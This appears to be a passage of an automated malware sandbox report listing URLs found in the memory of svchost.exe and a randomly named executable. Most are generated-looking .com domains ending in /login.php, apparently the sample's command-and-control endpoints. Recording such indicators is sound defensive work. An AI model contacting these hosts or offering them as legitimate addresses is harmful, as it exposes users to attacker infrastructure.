Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryman.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.0000000003364000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytod.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytun.com/login.php
Source: svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lyryvex.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvur.com/
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522994867.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522877168.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544003881.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656025861.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjex.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649584465.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysylun.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930331574.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysymor.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysynaj.com/http://qedynaq.com/http://vonypyf.com/http://vopybok.com/
Source: svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1734147322.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lysynur.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysysod.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytoj.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvan.com/
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744102613.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609404650.0000000005B8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741320070.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1734147322.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvax.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxux.com/
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693474228.000000000323A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666289273.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583628686.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxux.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908042179.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfux.com/login.php
